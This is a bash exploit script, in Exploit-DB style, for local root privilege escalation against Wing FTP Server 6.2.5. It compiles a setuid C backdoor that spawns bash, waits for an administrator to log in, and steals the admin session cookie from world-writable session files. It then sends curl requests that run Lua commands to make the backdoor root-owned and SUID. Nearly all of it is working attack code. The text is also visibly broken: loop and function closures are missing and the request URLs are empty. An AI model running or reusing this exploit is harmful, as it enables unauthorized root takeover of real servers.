# Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation  
# Google Dork: intitle:"Wing FTP Server - Web"  
# Date: 2020-03-03  
# Exploit Author: Cary Hooper  
# Vendor Homepage:  
# Software Link:  
# Version: v6.2.5 and prior  
# Tested on: Ubuntu 18.04  
# CVE: N/A  
# If $_WINGFTPDIR is the installation directory where Wing FTP was installed,  
# $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)  
# $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.  
# We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.  
# (writeup)  
echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'  
echo 'Exploit by Cary Hooper (@nopantrootdance)'  
function writeBackdoor() {  
#this function creates a backdoor program (executes bash)  
echo " Writing backdoor in $1"  
echo '#include <stdio.h>' > $1/foobarh00p.c  
echo '#include <sys/types.h>' >> $1/foobarh00p.c  
echo '#include <unistd.h>' >> $1/foobarh00p.c  
echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c  
gcc -w $1/foobarh00p.c -o $1/foobarh00p  
function makeRequest() {  
#Executes Lua command in admin panel to set the suid bit/chown on our backdoor  
#Change owner to root  
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" '' -H "Referer:" >/dev/null 2>/dev/null  
#Make SUID  
curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" '' -H "Referer:" >/dev/null 2>/dev/null  
directories=( "/tmp" "/var/tmp" "/dev/shm" )  
for dir in "${directories[@]}"  
#Check if directories are writeable  
if [ -w $dir ]  
echo "[!] Writeable directory found: $dir"  
export backdoordir=$dir  
echo " $dir is not writeable..."; fi  
writeBackdoor $backdoordir  
#Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).  
echo " Finding the wftpserver directory"  
export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)  
if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found. Consider looking manually."; exit 1; fi  
#Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary. Change the variable below and comment out the code above.   
#export sessiondir="/opt/wftpserver/session_admin"  
#While loop to wait for an admin session to be established.   
echo " Waiting for a Wing FTP admin to log in. This may take a while..."  
while : ; do  
if [ "$(ls -A $sessiondir)" ]; then  
#If a session file exists, the UID_ADMIN cookie is the name of the file.  
echo "[!] An administrator logged in... stealing their session."  
export cookie=$(ls -A $sessiondir | cut -d '.' -f1)  
export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)  
echo " Changing IP restrictions on the cookie..."  
cat $sessiondir/$cookie.lua | sed "s/$ip/" > $backdoordir/$cookie.lua  
cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua  
rm $backdoordir/$cookie.lua  
echo "[!] Successfully stole session."  
#Once found, make the malicious curl request  
export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir)  
echo " Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"  
makeRequest $cookie $urldir  
#Checks every 10 seconds. Outputs date to terminal for user feedback purposes only.  
sleep 10  
let "count+=1"  
if [ $count -eq 10 ]; then date; fi  
echo "..."  
#Check if backdoor was created correctly  
if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo " Something went wrong. Backdoor is not SUID"; exit 1; fi  
if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo " Something went wrong. Backdoor is not owned by root"; exit 1; fi  
echo " Backdoor is now SUID owned by root."  
echo "[!] Executing backdoor. Cross your fingers..."  
#Execute the backdoor... root!